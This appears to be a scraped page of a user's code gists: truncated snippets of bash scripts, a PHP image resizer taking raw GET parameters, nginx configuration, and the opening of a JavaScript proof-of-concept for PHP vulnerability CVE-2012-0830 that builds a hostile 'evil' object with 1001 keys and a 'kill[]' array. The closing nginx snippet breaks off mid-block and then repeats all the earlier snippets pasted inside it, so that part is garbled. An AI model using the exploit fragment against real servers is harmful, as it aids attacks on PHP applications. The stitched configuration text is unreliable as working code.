Pawel Zareba elchappo

## phpkill.js
// Simple proof of concept for PHP bug (CVE-2012-0830) described by Stefan Esser (@i0n1c)
// http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/

// Generate 1000 normal keys and one array
function createEvilObj () {
    var evil_obj = {};
    for (var i = 0; i < 1001; i++) {
        evil_obj[i] = 1;
    }
    evil_obj['kill[]'] = 'kill';

## ip-test.sh
#!/bin/bash

NOW=$(date +"%m/%d/%Y")

LOG=${PWD}/"ip.log"

MAIL="/bin/mail"

# email subject
SUBJECT="Latest IP address"

## gist:3925057
netstat -antp | awk  '$4 ~ /:80$/ {c++;print $5|"cut -f1 -d:|sort |uniq -c|sort -n |tail -n 10"} END {print c}'

## HTML 5
<html>
<figure id="hero-graph"><noscript>JavaScript is required to view this diagram. Your web browser either does not support JavaScript, or scripts are being blocked.To find out whether your browser supports JavaScript, or to allow scripts, see the browser's online help.</noscript>  </figure>
</html>

## gist:3925100
http://testing.nemezisproject.co.uk/resize/500/1000/0/originals/z12053861X.jpg

## gist:3925101
http://testing.nemezisproject.co.uk/resize/250/100/1/originals/z12053861X.jpg

## gist:3925102
http://testing.nemezisproject.co.uk/resize/500/500/1/originals/z12053861X.jpg

## resize.php
<?php

$resizer = new Resizer();
$resizer->setRequestFileInfo($_GET['path']);
$resizer->setRequestHight($_GET['hight']);
$resizer->setRequestWidth($_GET['width']);
$resizer->setRequestMode($_GET['mode']);
$resizer->generateImage();

/**

## cacheSentinel.sh
#!/bin/bash

CACHEDIR=
MAXSIZE=100
DIRSIZE=`du -s $CACHEDIR | cut -f 1`
MINFILES=5

echo $DIRSIZE' : '$CACHEDIR

#ls -t cache | sed -e '1,10d' | xargs -d '\n' rm

## gist:3925117
server{

        listen 80;
        server_name <domine>;
        access_log /var/log/<domine>.access_log;
        error_log /var/log/<domine>.error_log;

        root <domine_path>;

        location ~ ^/resize/([0-9]+)/([0-9]+)/([0-9]+)/(.*)$ {
	// Simple proof of concept for PHP bug (CVE-2012-0830) described by Stefan Esser (@i0n1c)
	// http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/

	// Generate 1000 normal keys and one array
	function createEvilObj () {
	var evil_obj = {};
	for (var i = 0; i < 1001; i++) {
	evil_obj[i] = 1;
	}
	evil_obj['kill[]'] = 'kill';
	#!/bin/bash

	NOW=$(date +"%m/%d/%Y")

	LOG=${PWD}/"ip.log"

	MAIL="/bin/mail"

	# email subject
	SUBJECT="Latest IP address"
	<html>
	<figure id="hero-graph"><noscript>JavaScript is required to view this diagram. Your web browser either does not support JavaScript, or scripts are being blocked.To find out whether your browser supports JavaScript, or to allow scripts, see the browser's online help.</noscript> </figure>
	</html>
	<?php

	$resizer = new Resizer();
	$resizer->setRequestFileInfo($_GET['path']);
	$resizer->setRequestHight($_GET['hight']);
	$resizer->setRequestWidth($_GET['width']);
	$resizer->setRequestMode($_GET['mode']);
	$resizer->generateImage();

	/**
	#!/bin/bash

	CACHEDIR=
	MAXSIZE=100
	DIRSIZE=`du -s $CACHEDIR \| cut -f 1`
	MINFILES=5

	echo $DIRSIZE' : '$CACHEDIR

	#ls -t cache \| sed -e '1,10d' \| xargs -d '\n' rm
	server{

	listen 80;
	server_name <domine>;
	access_log /var/log/<domine>.access_log;
	error_log /var/log/<domine>.error_log;

	root <domine_path>;

	location ~ ^/resize/([0-9]+)/([0-9]+)/([0-9]+)/(.*)$ {